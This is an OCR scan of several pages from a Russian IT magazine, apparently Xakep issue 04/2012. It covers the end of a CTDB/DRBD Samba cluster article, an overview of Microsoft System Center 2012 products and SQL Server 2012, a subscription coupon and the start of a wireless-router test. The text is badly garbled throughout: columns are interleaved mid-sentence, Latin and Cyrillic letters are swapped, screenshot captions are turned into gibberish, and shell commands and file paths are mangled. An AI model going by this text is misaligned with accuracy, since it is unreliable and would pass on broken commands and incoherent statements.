них компонентов сервера. Е сли же умер сам жес т кий диск, то
esac
после его замены сервер достаточно просто ввести в строй. В За состоянием
большинстве случаев для этого понадобится выполнить всего
CTDB
в режиме реального времени можно на
блюдать с помощью команды
две команды:
«ctdb status>>.
Три первых строки в ее
выводе наиболее информативны, они отражают состояние узлов:
# #
ОК- узел функционирует нормально;
drbdadm create-md re drbdadm attach re
DISCONNECTED- узел недоступен; DISABLED- узел отключе н администратором,
можно вновь смонтировать раздел и перезапустить самбу и
UNHEALTHY- существуют
CTD B:
проблемы, мешающие подключить
узел к кластеру, при этом сам демон
# # #
mount /dev/ drbde /e tc / init . d/ ctdb res tart /etc / init : d/samba restart
BANNED -
CTDB
работает нормально;
узел попал в ба н из-за слишком большого количе
ства попыток восстановить работу, скорее всего проблема в неправильной настройке С Т ОВ;
STOPPED- узел Чтобы быть в курсе событий и вовремя реагировать на падение
отключен от кластера, но принимает управ
ляющие команды;
уз лов, следует применять различны е методы мониторинга, это мо
PARTIALLYDNLINE- узел
жет быть что у г од но , начиная банальны м пингом по крону и закан
сети.
чивая специализированными система типа
однако он с по со
бен нормально функционировать;
За т ем начне т ся синхронизац ия массива, по окончании которой
monit.
работает, нонедоступен из внеш н ей
Мы уже не раз
писали в][ о мониторинге, поэтому я не буду рассказывать об этом
Также следует обратить внимание на строку Recoveгy
mode,
подробно. Кстати, отслеживать ситуа ции с проблемами в работе
ражающую режим работы кластера. Возможные значения:
CT DB очень просто с помощью скрипта /etc/ctdЬ/not if y.sh, который
•
выпол няет ся в тех случаях, когда появляю т ся проблемы в работе
vNORMA L- кластер функционирует нормально. RECOVERY- производится восстановление работы
узла, и он отключается от СТОВ-кла стера. Пропи сать в скрипт
на время которого он недоступен.
от
кластера,
можно все что угодно,- например, отправку письма админу:
В любой момент узел можно отключить от кластера с помощью
vi /etc/ctdb/notify.sh event="$1" shift
#
команды
«ctdb
disaЫe>> и вернуть с помощью
«ctdb
enaЬie>>.
I:I§I:I•J!Шi Сегодня развернуть кластер высокой доступности не так уж и
case $event iп unhealthy) ХАКЕР
сложно. Как видишь, все что для этого требуется- несколько машин, пара жестких дисков и немного свободного времени. ::Х::
127
04/159/2012
www.epidemz.net
SYN/ACK
Сергей Яремч ук lgrinderlasynack.rul
В этом году корпорация
IТ-РЕШЕНИЯ ОТ
Microsoft практически полностью
обновит линейки своих основных продуктов. Большие
MICROSOFT: ОБЗОР
изменения ждут и популярное семейство инструментов
ГЛАВНЫХ НОВИНОК 2012 ГОДА
управления
System Center, функции которого будут
максимально адаптированы к современным реалиям .
Учитывая, что все
RC
вышли точно в срок, а в ближайшее
время станет доступен
RTM,
сейчас уже вполне можно
оценить нововведения .
ХАКЕР
128
www.epidemz.net
04/159/2012
С в ежее ды ха н ие
• &
Getting started
AvailaЫ~ ~tup
~
OpUons
has not de..ected an existJnQ lnst&laьon oi а PnmiiYSite server, console on ttus computer. .,
S«.ondмy ~ ~, Slte: ~.
------
or Config~ntion
МoNger
~ tulh.-.ldolot .....
Sol\wW\OUof l*'t
r.
lnsQП а Conf\9untюn Мзмgеr Prinwy Sde
f41Ьock-.:I DCIO'I . Oo.lfl ь.r.!-.. .....
server
.......
~~-·'-~
Г-7 Use [)'Piallln5ui\.):I0n optiorls for 11 single setVef tnШia tюn -lnstal t~ ~ МanagefPiitмfySt".e
~ c..-. v.- s.-- ,... ...,._ c...g w.ь::..r..c
-Use defaut~tюn path
ioUJolo.~.........,_
r r
!nsDIII11 Configur.1tюn Мгr;аоеr Cen:ral Admnstr~ SJ!t:
r r
F....::'_. . . . . ._" . . . ____ <
В
..
МоЬiо""-nАМТ.-,...
- Cor.figu-e loal SQL SeNer vllth defo!!Ut ~ - Enoble 11 local rмnogement poll"t fOf ConfiguratiOn ~ · ЕмЬ1е common Ccnfi9uratJon ~ cLentaQettts
SCCM 2012
nоявиnась роль
Prevюus
11
*
Next>
Спи с ок рол е й с а й та
Central Administration Site
SYSTEM CENTER CONFIGURATION MANAGER 2012
SC CM 201 2 т акже
nретерпел изменения
Такой сайт не обслуживает клиентов и nоддерживает ограниченное
количество ролей IAI, Software Update Point, RSP и SHVI. Но глав н ое,
Первое, что бросается в глаза, э т о изменение списка продуктов, Configuгation. Теперь он выглядит сле
в nодчинении CAS может быть только один основной IPrimaryl сайт,
дующим образом: Configuгation Мапаgег, Opeгations Manageг, Seгvice
тогда как ранее nоддерживалась вложен н ость нескольких Pгimary.
Manageг, Data Pгotection Manageг IDPMI, Viгtual Machine Manageг IVMMI, Oгchestгatoг и два новых продукта- Endpoint Pгotection [ранее Forefгont EPI и AppController. Центральное место в линейке з анимает SCCM 2012lтакже известен как v.Nextl, покрывающий
Secondary Site требуют наличия SQL-cepвepa !можно исnользовать бес nлатный Expressl. Привычных режимов Native и Mixed нет, теперь просто так и на Distгibution
практически полный цикл управления всей ИТ-инфраструктурой
настройки. Клиент может nеребирать м ежду несколькими
установка ОС, приложений и обновлений, контроль конфигурации,
Point
входящих в семейство
System
SCCM 2012
Point.
На разные коллекции можно назначать свои
Management
внутри сайта и подключаться к доступному. Это, кстати, основные
nричины отказа от многочисленных Pгimary сайтов, так как такой подход
инвентаризациясофтаи оборудования. Поэтому с него и начнем. Требования к системе
указываем режим работы по НТТР и/или НТТРS, как для сайта в целом,
упрощает структуру, да и уменьшает количество лицензий.
немного изменились, те
перь только 64-битные ОС, его можно установить на Win2k8/R2
Point теперь носит имя Reporting
Seгvices
Reporting Point и базируется на SQL
с MSSQL2k8SP1Ix64l или позднее. Хотя точки распространения IDP,
Repoгting Seгvices, nоэто му не получится nеренести настройки со старой
Distribution Pointl по-прежнему работают на х86 Win. Так как измени лась архитектура и логика работы, апгрейд со старых версий SCCM не предусмотрен. Для миграции с SCCM 2007 на SCCM 2012 пред ложен мастер IMigration -7 Migгation Jobsl, который после запуска
системы. Точки Bгanch
DP уже нет как таковой, SCCM 2012 исnользует SCCM 2012 реализована новая концеnция, по лучившая название UCM IUseг Centгic Managementl, -такой подход сде
технологию BгachCache. В
лал его более дружелюбным к пользователю, предлагая ему большие
будет задавать вопросы о коллекции, объектах и прочих специфи
возможности по контролю и самостоятельному сопровождению системы
ческих настройках. Внешне сам процесс выглядит довольно просто,
! е стественно, в рамках nолитик!. Теперь именно nользователь выбирает
в результате будут перенесены основные настройки, а также образы,
приложения для установки и оnределяет, когда на компьютер будут за
обновления, драйвера и прочее. П равда, для этого необходимо будет
гружаться обновления, указывая для этого рабочие часы в настройках.
полностью развернуть н овую инфраструктуру, в том числе переуста
Ранее все было с точностью наоборот,- основной точкой уnравления
новить клиента, перенести ресурсы и по окончании процедуры
был комnьютер, пользователь оставался за кадром и решений никаких
выключить старые сервера. Конечно, некоторая часть данных в новой
не принимал. Новый подход видится мне более nравильным, nоскольку
консоли потребует уточнения,- например, если пакеты хранились
администратор не всегда владеет ситуацией и ориентируется лишь на
локально, понадобится указать новый nуть, хотя для их размещения
роль и групnу. Кроме того, индивидуальные требования nри большом
обычно исnользуются общие ресурсы, так что особых проблем быть не
количестве nользователей учитывать тяжело, а обновлен и е, да еще
должно. База инвентаризации не nере носится, она будет заnолнена
с nерезагрузкой, устанавливаемоевнеподходящее время, может сильно
nомешать. Если за комnьютером работает несколько пользователей,
новыми данными, поэтому не сохранится и история .
В
SCCM2012
интегрирована четвертая версия инструмента ми
один из них назначается основным. Сами nриложения разделены на
грации учетных записей USMT IUseг State Migгation Toolkitl. Функция
обязательные и доступные IRequired или AvailaЫel, также определяется
развертывания ОС 050 IOpeгating System Deploymentl всегда была
тиn установки !локальная, терминал, виртуаль н ое App-V, Windows M oЬile
одной из сильных сторон
CABI, зависимости и nрочее. Для nоиска AvailaЫe nриложений nольза-
SCC M, с nоявлением иерархической модели
!образы не привязаны к определен н ому сайтуl нет необходимости в с охранении индивидуал ьн ых образов, сущес тв енно уnрощена ра б ота с
WIM.
Возможность РХЕ теnерь nоддерживается только точками
распространения ОР. Поддержка технологии lntel vРго/АМТ nозволяет nолучить достуn к железу, минуя ОС. Одной из целей разработчиков было уменьшение количества серверов, так как ранее из-за сnецифи
ческих настроек коллекции часто требовался еще один Ргimагу
Site,
в результате даже в небольшой организации серверов могло быть неприлично много. В иерархии появилась роль Central Administгation Site ICAS, аналог Centгal Ргimагу Sitel, исnользуемая только для у правления иерархией и отчетов.
Х АКЕР
ПОДДЕРЖКА ТЕХНОЛОГИИ
INTEL VPRO/AMT ПОЗВОЛЯЕТ ПОЛУЧИТЬ ДОСТУП К ЖЕЛЕЗУ, МИНУЯ ОС 129
04/1 59/2012
www.epidemz.net
SYN\ACK
• u
~ -
s~s..~;;;::.:~
1.
Ji.
~:-'·~,::.;:·.
.:. ш и..,,"""''
~~--.... ,....::о<!!о,. - ·,_,..,"'""'
........ ...
1'"----
11!11·
-
Gentfal Pтopert.e ~
Selectthetypeoftesktocre;,te
SМICQМn'\41'\dDetMr
s,.,..,.. ~~y
т~
• 0...""V)>!.Ict+'.od1
~
001·КО!l0 1 lМ.
ДOeroi.T~skt
8 •
_...,
Commarod ine - Rll"' ll UN IXAI'UI Shd Corm'lll'ld
L ,!C<II'Idor)o~
-
. . . .....
t.<•o•gew..r.eo
·.;,
:~~
R..n i i C:Iil)l
Contolt l 11kt ~ Ait!l cotml6r'ld li'oe
fJ..>.<r.tO.кtO<)fo
Commмм:l ine
-
-s. .
'~<Cpo•a!OO<I<
D"criptюrc
·- .
T histask rllll e thelcOfМIМIC!onlheWgeted U N IXILMCompulot
,.
s. .• c.... ~OW<"ИIO'
t• ., .... o.... , ~'l'
Cc.,Pr og••"' ~• •• M~"'~'ICO"' ·i'J'O t<l"
Mo"~nagem e ntpack
'-1L•..;oor
Консоль у nравления
SCCM 2012 выnолнена
в новом стил е
вателям предложен Softwaгe Centeг, после выбора администратор может одобрить или блокировать установку. Приложение, в зависимости от
SCCM 201 2 позволяет выполнять
к оманды на * niх-сист е ма х
конкретной ситуации [пользователь работает на ПК, терминале и так далее], можетустанавливаться по - разному. Например, на ПК это будет
единственного сервера . Хотя в целях обратной совместимости ввели
локальная установка, а с терминала- виртуальная. Устанавливаемые
специальную роль
программы отслеживаются в узле Monitoгiпg, а не в
обязательно строить кластер,- администраторы могут объединять
Status Message мастера из Client Custom
Vieweг, как в случае
SCCM2007. При запуске Settings администратор указывает, на кого распространяются
настройки
-для пользователя они или для компьютера. Многие администраторы
RMS
Emul atoг. Чтобы справиться с нагрузкой, не
серверы управления в группы и для
Health
Seгvice создавать пул
ресурсов [Resouгce Pool] из нескольких Managemeпt Sегvег. В обыч ном режиме задачи выполняет только один из серверов пула, другие
перед развертыванием проверяют работу на тестовой группе, -теперь
подхватывают его роль только в случае недоступности. П олучается
все установки из такой среды легко импортируются на рабочие станции.
такой себе Fa iloveг C l usteг без Fai loveг Clusteг. Во время установки
Интерфейс реализует ролевую модель управления доступом Role-Based Access Contгol [RBAC], скрывая те настройки, которые недоступны поль зователю. Во вкладке Secuгity Roles можно найти 13 предустановленных
Notifications
ролей, при необходимости администратор может самостоятельно добав
по умолчанию создается три пула: АО Resouгce
Pool
Assignment Resouгce Poo l, All Management Seгveгs Resouгce Pool,
и
остальные администратор может настроить самостоятельно.
Для хранения данных вместо ОЗУ [как это было на
Root MS
лять новые, ориентируясь на бизнес-структуру компании. Сами объекты,
и требовало мощного сервера] используется только БД. Консоль
коллекции, с которыми может работать роль, определяются в Secuгity
управления внешне изменилась мало, зато веб-консоль перерабс
Scope, а раздавать права можно на уровне коллекции, а не сайта. В SCCM 2012 интерфейс консоли обновлен и выполнен в стиле MS Office, он со
тана существенно, но осваивается легко. Кроме
Client Health lccmeval.exe], отправляющая по расписанию сообщение о его текущем
Windows, полно Linux и *пiх. Уже сегодня доступны пакеты управления [Management Pack] для поддержки популярных серверов приложений : Apache Tomcat, IBM WebSpheгe, Java ЕЕ, Огасlе WeЫogic, Red Hat JBoss и других. Обеспечивается диагностика и веб приложений, созда нных на базе .NET и J2EE и Windows Azuгe. Доступный набор командлетав PoweгShell [имя включает SCOM/ SC] теперь дает возможность управлять в том числе и *пiх - системами.
состоянии и возвращающая его в рабочее состояние в случае проблем.
Чтобы получить список всех командлетов, достаточно ввести:
стоит из так называемых Wundeгbaг, содержащих ссылки на меню управ
ления, и уже не является ММ С. Конечно, некоторое время приходится привыкать к расположению пунктов меню, но затем новый интерфейс находишь вполне удобным и логичным. Еще одно важное изменение, - на клиенте устанавливается специальная программа
Также
SCCM 2012
получает некоторый функционал
SC AppContгo l leг,
ценно OpsMgг
2012
поддерживает
из
вестный ,под кодовым именем Саnсего [лат. «связывать>>], позволяющий
SaaS услугами и приложениями в приватных облаках, по строенных на Windows Sегvег, Нурег-V и Viгtual Machine Manageг 2012, и в публичных облаках на базе Windows Azuгe. Владельцы могут разверты вать VM, получать доступ к ресурсам, и с пользовать несколько подписок Windows Azuгe, копировать V Н О-образы.
PS > Get-Command -Module OperationsManager
управлять
Пакет управления UNIX/Linux Shell Command Template предлагает шаблоны, позволяющие создавать правила, задания и мониторы, используя команды обо лочки непосредственно с панели OpsMgг. В сравнении с OpsMgг
2007
сам процесс настройки при помощи
мастеров- упреет. В финальном релизе данный пакет будет уста
SYSTEM CENTER
OPERAТIONS
MANAGER 2012
навливаться по умолчанию, для
Теперь OpsMgг является основным инструментом для управления
RC
его нужно с качать и установить
отдельно.
частным облаком, включая возможности мониторинга сетевых устройств и технологию контроля производительности приложений
AVICode.
В частности, кроме серверов можно обнаруживать и отсле
живать маршрутизаторы, в том числе отдельные интерфейсы и порты,
а также VLAN [обнаруживаются автоматически]. Поддерживает SNMPvЗ, 1Pv4/1Pv6, ведет статистику по трафику и скорости, осущест вляет ко нтроль работы п ротокола
HSRP и
многое другое.
В новой версии OpsMgг все сервера управления стали равно
правными, то есть роли
Root
M anagemeпt Sегvег больше нет, кон
фигурацию агентов вычисляет каждый с OpsMgг
2012
Management
Sегvег. Теперь
вся инфраструктура не зависит от доступности одного
MICROSOFТ
DEPLOYMENT TOOLKIT 2012
Главное нововведение в МОТ -улучшенная интеграция с
SCCM 2012 OaRT [Oiagnostic and Repaiг Toolkit, входит в Oesktop Optimization Pack]. При этом МОТ2012 полностью вписывается в новую консоль SCCM 2012 [может работать и с SCCM2007] и понимает измененную модель и АО, а также поддержка
приложений [терминальные, виртуальные и так далее!. Собственно, процесс работы с МОТ мало изменился, отличия в интерфейсе nрактически не бросаются в глаза. В настройках появились два новых
Task Sequences: Oeploy to VHO Client Task
Sequeпce и
Oep loy to VHO
ХАКЕР
130
www.epidemz.net
04/159/2012
Свеж ее ды х ани е
Ef
I!IDefault Antimalware Policy
•
SCCM2007 ищи в][ 08.09/09.09/01 .1о.
Schedu led scans
'----
Scan settings
~
Def ault actions
The settings thal ~о" specif~ in ll1is polic~ appl~ to all Endpoint Protection clienls ir1 the hierarch~. CLrstom policies override the defaL<II polic~.
• Установка и настройка SCOM 2007 описана в][ 08.11.
Real-time protection Exclusion settings
•
Процесс
развертывания
Advanced Threat overrides
Specify scheduled scan sellings
r~icrosoft
~
Active Protection Service
Definition updates
i
2007 освещен [ 09.11 .
Run а schedL<Ied scan on clienl compL<Iers:
lтrue
Scan !~ре:
1QLrick scan _:j
Scan da~:
lsaturda~
_::1
Scan time:
l2дМ
j]
Dail~
с МОТ
• Страница SCCM 2012: clck .ru/eNЗT. • Страниц а МОТ 20 12: micr osoft.com/mdt .
:::J
quick scan schedule tirne:
Check for the lalesl definition Lrpdates before rur1ning а scan:
IFalse
_::1
Starl а scheduled scan onl~ when lhe computer is idle:
lтrLre
_::1
Rar1domize ll1e schedLrled scan starl limes (wilhin 30 minules):
IFalse
_::1
Force а definilion L<pdale if the clienl compuler is offline for more than two consecutive scheduled updates:
1True
3
Limil CPU L<sage during scans lo (%):
lso
3
ок
~·
FEP
в]
• Подробно о работе 2010 читай в][ 10.09.
_::1
_:.!
Run а dail~ qLrick scar1 or1 client computers:
Наст ро йка ска н и р ов ания
Обзор
во з можност е й
Scheduled scans
Cancel
SCEndpoint Protection 2012
Sегvег Task Sequence [развертывать VO I, клиентский ПК или сервер!. Конечно, при помощи МОТ
2010 также
было возможно произвести
P2V миграцию, задействуя Sysiпteгпal Oisk2VHO [на Tech Net доступна
Нововведений очень много, и они затронули все без исключе н ия подкомпон е нты сервера. Одни направлены на повышение произво дительности и доступности, другие позволили расширить круг задач.
инструкция clckгu/ЮOp l, но процесс не совсем тривиален и не всем
К слову, в тестировании СТР-версии участвовало более
понятен. Теперь зто стан д артная операция, все настройки которой
зователей, которые высказали свое мнение по поводу исправлений.
выполняются за несколько кликов мышкой. Также заявлено, что
Приведем лишь некоторы е , наиболее важные.
МОТ
2012
будет поддерж и вать грядущую ОС
Win8.
Используемый для
100 000
Сисадмины наверняка оценят п оддержку установк и н а
поль
Win 2k8 R2
редактирования установок в МОТ_ F O L O ER /Scгipts/ U D I Wizaгd _Config.
в режиме Sегvег Саге: теперь для развертывания SQL-cepвepa не тре
xml инструмент UO I Oesigneг [Useг-Oгiven lnstallation, nоявился в МТО2010 Update 11 nолучил новый интерфейс и возможности. Так вместо двух сценариев из ко р обки теперь их т ри: New Compute г, Refгesh и Replace. д д ми н истра т ор может n р осмотреть список всех
буетсяграфическаяоболочка.Представленонесколькоинструментов
сценариев в одном окне и изме н ить распо л ожение простым перета
миграции: Upgгade Advisoг, Distгibuted Replay и Migгation Assistant [SSMAI . Базирующаяся на концепции групп д оступности [Avai l a Ы iity Gгoupsl технология HADR [High-AvailaЫiity and Disasteг R ecoveгyl по з воляет повысить доступность экземпляров SQL Sегvег за счет
с киванием. Сам мастер расширяем, хотя процесс не совсем прост [на
дополнительных копий БД. Такие копии могут работать в режиме
TechNet приводится пример ко д а!. А еще - усовершенствован мастер Lite Touch, улу ч шена миграция учетной з ап иси, реализована полная поддержка WinRE. Все задачи можно решить при помощи PoweгShell. Поддержка старых ОС WinXP и Win2k3 сохранена .
«только чтение>> и использоваться, например, для отчетов, что с н имет
на г рузку с рабочей БД.
Реализована поддержка кластера на разных подсетях [SQ L Sегvег Multi-Subnet Clusteгingl. Для очистки дубликатов в дан н ых nредложен новый компонент
НОВОЕ В Вероятно,
MS SQL SERVER 2012[DENALI]
SQL Sегvег'у будет принадлежать первенство в линей 2012, так как его выход планируется уже весной.
к е обновлений
Х АКЕР
Data Qua lity
Seгvices. И нструменты
управления позволяют эффективно манипулировать про и зво дительностью в такой многопользовательской среде как частное
облако. Новый компонент Роwег View [Cгescentl с богатыми воз-
131
04 /15 9/2 01 2
www.epidemz.net
SYN\ACK с:;с File
Edit
..:J j
IEI •.... ,.
~
Vlew
Favorites
F.!lvorites
Tools
в
••
х 1 . :....
Help
.
"~
EJ Арр Controller
1
'·"1"
1
~
fill - •
~
-
~ S~tem Center 2012 ~ Ov~Ni~w
(1
r!) s~rvices iit Ubrary
0Jobs
Safety •
Tools -
Арр
Controll
4
Overview
Clouds
V irtual Machines
Page ..
last refri!-Sh. 01 38:48 РМ
StatLJS РuЬ11с
Prl\'dtf' Clouds
Clouds
+
+
7' Settings
Next Steps Cornmon Т usks
AppController nозволяет уnравлять сервисами внутри облака
можностями представления информации для анализа позволяет
сути, АррСопtгоllег призван дополнить все имеющиеся сегодня
пользователям самостоятельно строить отчеты на основе BIS M
инструменты, с которыми приходится иметь дело ад м инистра
[Busiпess lпtelligeпce Semaпtic Model]. Семантическая модель
тору: SCVMM, SSP IViгtual Machiпe M anageг Self-Seгvice Poгtal
бизнес-аналитики BISM объединяет в себе модели данных UOM
или Solutioп Acceleгatoгl, ODTK [Dynamic Dataceпteг Toolkit ]
и табличную PoweгPivot. Улучшены механизмы полнотекстового
и консоль Azuгe Platfoгm. АррСопtгоllег позволяет владельца м
поиска: по отдельным свойствам через I Fi lteг, и NEAR, позволяю·
приложений создава ть ресурсы с использование м шаблонов
щий указать порядок следования слов и расстояние. Добавлены
и библиотек, управлять ими, отслеживать активност и , вы п ол
новые разрешения и механизм nользователь ских серверных
нять журнал ирование всех действий и многое другое . Н а пр и м е р ,
ролей, добавлена поддержка SHA2 256/512. Также предложена SQL
разворачивать приложения могут сами менеджеры п о др азделе
Expгess LocaiDB- легковесная версия БД с поддержкой всех функ
ний, а ИТ-персонал просто контролирует этот процесс. К аж д ы й
ций, не требующая конфигурирования и прав администратора.
пользователь получает веб-интерфейс, где будут досту пн ы только
определенные [в зависимости от его роли! фун к ц ии.
APPCONTROLLER 2012
ЗАКЛЮЧЕНИЕ
AppContгolleг 2012- новое решение в семействе System Сепtег, предназначено для контроля приложений внутри об·
Б ольшая часть изменений носит позитивный характер, поскольку по
лака [публичного и частного], развертывания и управления
зволяет упрост ить работу как админу, так и пользовател ям . Осталос ь
сервисами. Это единый интерфейс ко всем ЦОД и Azuгe. По
дождаться финальных релизов. Х
ЛИЦЕНЗИРОВАНИЕ ЛИНЕЙКИ SYSTEM CENTER 2012 Модель лицензирования всех продуктов линейки
System
Сеп -
tег 2012 полностью изменилась (подробнее clck.ru/ePUN ), она не
П е рв а я по з воляет управлять только двумя виртуальными ОС (на ч ас тном или п у бличном облак е ) , у второй ограничения отсутствуют.
привязывается к решению и оптимизирована nод использование
Причем в пакет лиц е нзий уж е включ е ны nрава на исnользование
в рамка х pгivate cloud. Теперь все лицензии включают в себя
се рв е ров уnравления и
право на использование всего функцианала всех nродуктов
потр е бу е т с я.
линейки . Другими словами , отдельные лицензии на nродукты исче з ли , и нет ограниче ни й
no возможностям. При зто м консоли
SQL Ser v eг, - отдельно их покупать тоже не
Суммарно стоимо с ть лицен з ии выросл а , но она нивелируется за счет того , что в н ее включ е ны лицензии на подкомnоненты.
у nравления уже не требуют лицензии . Хотя одно ограничение
Кли е нт ские лицен з ии по - пр е жнему требуются, но теперь они также
все ж е есть- каждая лицензия покрывает
объ е динены и буд ут до с тупны в рамках набора
2 физических CPU. Достуnны лишь два варианта: System Сепtег 2012 Standaгd и Data center, которые отличаются лицензированием виртуальны х сред .
System Center Client ML Suite , в который в х одят лиц е нзии для Seгvice Manager, Opeгation s Manager, Data Prote ction Manager и Orchestгatoг. Отдельно доступны
ХАКЕР
132
www.epidemz.net
04/159/2012
ГОДОВАЯ экономия
Подписка 1.
Ра зб орчиво з аполни подпи с ной купон и кви
12 НОМЕРОВ 6 НОМЕРОВ
танцию, выр езав их из журнала, с д елав ксе
рокопию или расп ечатав с сайта
shop.glc.ru.
2.
Оплати подписку через любой ба нк.
3.
Вышли в редакцию копию п одписных доку
500
2200 1260
руб.
РУБ. РУБ.
ментов- купона и квитанции- любым из
УЗНАЙ, КАК САМОСТОЯТЕЛЬНО ПОЛУЧИТЬ
нижеперечисленных способов :
ЖУРНАЛ НАМНОГО ДЕШЕВЛЕ!
• н а e-mail: subscribefag lc. r u; • по факс у : [495) 545-09-06; • почто й п о а др есу: 115280, Москва , ул. Л е нин ская Слобода, 19, Омега плаза, 5 эт ., офис NQ21,
000
ПРИ ПОДПИСКЕ НА КОМПЛЕКТ ЖУРНАЛОВ
ЖЕЛЕЗО+ ХАК ЕР+
2 DVD : 162 Р УБЛЯ
ОДИН НОМЕР ВСЕГО ЗА
<< Г ейм Л эн д », отдел подписки.
[НА 35 % ДЕШЕВЛЕ, ЧЕМ В РОЗНИЦУ) ВНИМАНИЕ! ЕСЛИ ПРОИЗВЕСТИ МОЖНО ОФОРМИТЬ С НОЯБРЯ.
ЗА 12 МЕСЯЦЕВ 3890 РУБЛЕЙ [24 НОМЕРА] ЗА 6 МЕСЯЦЕВ 2205 РУБЛЕЙ [12 НОМЕРОВ]
ЕДИНАЯ ЦЕНА ПО ВСЕЙ РОССИИ. ДОСТАВКА
ЕСТЬ ВОПРОСЫ? Пиши на i n f ofag l c .г u или звони по бесплатным те лефо
ОПЛАТУ В СЕНТЯБРЕ, ТО ПОДПИСКУ
ЗА СЧЕТ ИЗДАТЕЛЯ, В ТОМ ЧИСЛЕ КУРЬЕРОМ
нам
ПО МОСКВЕ В ПРЕДЕЛА Х МКАД
др у ги х регионов России, абоне нто в сете й МТС. Би Л айн и Ме гафон) .
8[495)663 -82-77 [для москвичей) и 8 [800) 200-3-999 [для жителей
ПОДПИСНОЙ КУПОН ПРОШУ ОФОРМИТЬ ПОДПИСКУ НА ЖУРНАЛ « ХАКЕР »
D D
на
6
на
12
месяцев
начиная с
D
месяцев
_ _ _ _ _ _ _ _ 201
Извещение г.
ИНН
77294 1001 5
000
« Гейм Л э нд »
ОАО « Нордеа Банк », г. Москва
До ставлят ь ~ур н а л по почте
р/с
No 40702810509000132297
к/с
No 3010 1810900000000990
н а домашни и адрес
БИК
До ставлять журнал курьером:
D D
кпп
044583990
н а адрес офиса*
Плате льщик
н а домашний ад рес**
Адрес (с индексо м )
(отметь
квадрат выбранного вар и анта подписки)
Назначение платеж а Оплата журнала
Ф. И .О.
770401001
Сумма
«_ _ _ _ _ _ _ >>
2012
с
г.
Ф . И .О.
К асс ир
Подпи сь плательщи ка
АДРЕС ДОСТАВКИ: и
екс
Квитанция
ИНН
77294 1001 5
000
« Гейм Л э нд "
ОАО « Нордеа Б анк>>. г. Москва
No 30101810900000000990
БИК
квартира/офис
(
кпп
770401001
Адрес (с инд ексо м )
сумма оплаты свободном
044583990
Пл ательщик
•а
No 40702810509000132297
к/с корпус
дом
тепефqн
р/с
none
Н азначение платежа укажи название ф1-1рмы
Оплата жур нала
и друrую необ;l(одимую информац~о~ю
• · в свободном nоле укажи другую необ:.~одимую информацию и альтернативный вариант доставки в случае отсутствия дома
с
Ф. И .О.
Кас с ир
П одпись плательщика
www.epidemz.net
Сумма
«_ _ _ _ _ _ _ >>
2012
г.
ТЕСТИРОВАНИЕ ТОПОВЫХ РОУТЕРОВ
1]
еспроводной мар ш рутизатор- это не просто коробочка,
же будем пользоваться
в которую можно «воткнуть интернет» и раздавать его
тест идет не менее минуты. На данном этапе тестирование можно
по проводам и воздуху. Такие устройства таят в себе
поделить на три составляющие:
множество интересных функций, о которых ты можешь даже и не
догадываться. В этом обзоре мы собрали самые производитель
throughput,
для объективности . Каждый
1] Тест производительности протокола РРТР. На ПК с Microsoft Windows Server 2008 R2 Standard поднимается РРТР-сервер, затем
ные бытовые раутеры от известных компаний. Итак, втыкай свой
роутер настраивается на подключение по данному протоколу через
патчкорд,- поехали!
WАN - порт. К LАN-порту подключается клиент.
МЕТОДИКА ТЕСТИРОВАНИЯ Вначале давай ознакомимся с методикой тестирования роутеров.
21 Тест nроизводительности NAT. Настройка аналогична nервому случаю, только подключение настраивается через Static IP. 3] Тест Wi-Fi. К LAN-nopтy маршрутизатора nодключается один
Начнем с железа. Н ам по надобятся сервер, клиент и ноутбук. Те
клиент, а по беспроводной сети- второй. Таким образом, nропу
стировать будем на платформе Wiпdows, поэтому на сервере уста
ская трафик между двумя ПК, мы можем оценить производитель
новлена
Staпdaгd, а на остальных
ность именно беспроводной сети. Также настраивается шифрова
ПК-
измерения результатов
ние
Microsoft Wiпdows Sегvег 2008 R2 Microsoft Wiпdows 7 Ultimate х64. Для
и нагрузки канала будет использоваться пакет от компании
lxia,
содержащий в себе конечные точки [eпdpoiпts, должны быть уста новлены на всех П К, участвующих в тесте] и консоль управления lxchaгiot.
lxchariot
имеет в своем арсенале множество скриптов, мы
WPA2-PSK
с ключом
AES.
Стоит отметить, что для теста будут использоваться одноименные WiFi-«свистки»: ASUS USB-N53, 0-Link DWA-160. TP-Link TLWN821 N и ZyXEL NWD2205 ЕЕ. Для остальных устройств применяем адаптер ASUS USB-N53 .
ХАКЕР
www.epidemz.net
04/159/2012
t1 ASUS RT-N66U «Ой, какой красивенький», - фраза дев ушки техноманьяка, ко
торый приобрел себе
ASUS RT-N 66U.
Д ействительно, этот роутер
имеет необычный и привлекательный внешний вид. В компа нии
ASUS
учли недостатки предыдущей модели
ASUS RT-N56U
и сделали корпус из матового пластика вместо глянца, а кроме того роутер теперь имеет три внешних антенны, располагается
горизонтально, что более удобно, и е г о стало возможно повесить на стену. В общем, внешние недоработки предыдущего
N56U
ASUS RT-
были исправлены.
Роутер
ASUS RT-N66U
.,_ сочетает в себе мощь и пр остату настрой
ки, интуитивно понятный пользовательский интерфейс позволит
разобраться в настройках даже новичк у. Устройство оснащено двумя портами
USB, так
чт о ты можешь одновременно использовать
внешний накопитель и принтер для доступа к ним по сети.
N66U
ASUS RT-
напичкан серьезным железом и потому показывает отличные
результаты в тестах: обошел конкурентов своего класса во всем, кроме одного параметра-скорость РРТР. Однако сегодня трудно найти провайдера, который бы обеспечивал доступ к интернету
на скорости, превышающей 100 М бит/с, а с этим AS US RT-N66U справится л е гко. Кстати, этот роутер поддерживает
Dual Access,
что
очень важно для большинства отечественных провайдеров.
ХАКЕР
04/159/ 2012
135
www.epidemz.net
FERRUM
D-LINK DSR-SOON ВНЕ КОНКУРСА
трогий и лакон и ч ны й вн е шн ий в ид 0-L iпk
OSR-50 0N
го в орит нам о с ерье з ной начи н ке и профессионал ь ной направл е ннос т и устрой с тва. К р е п ле н ия д л я сервер н ой с т о йки , переднее р ас положение ра з ъем о в и два WА N -порта- все это фичи промышленн о г о масштаба. Однако 0-L iпk
OSR- 500N
о с нащен US В - п орт о м и мо д ул ем Wi- Fi [в к рупн ы х с етях ч а щ е и с поль з у ютс я о тд е л ьн ы е точк и д ос туп а ! , бо льше подходящими для д о м а и мало г о офиса. Так и м об р азом, м ы пол у ч ае м гибрид , соче т а ющи й в с ебе функ циона л к ак дл я д о ма , так и для б ольшого о фиса, и пр и э т о м обла дающи й же л езом, ко т о р о е может выд е ржать серьез н у ю нагр узк у .
Н ас тройка
nр о д у ктов
0-Link OSR -5 00N а нал о г ичн а настройке остал ь ных 0-L ink. О с новные параметры может ска н фигу ри рова т ь
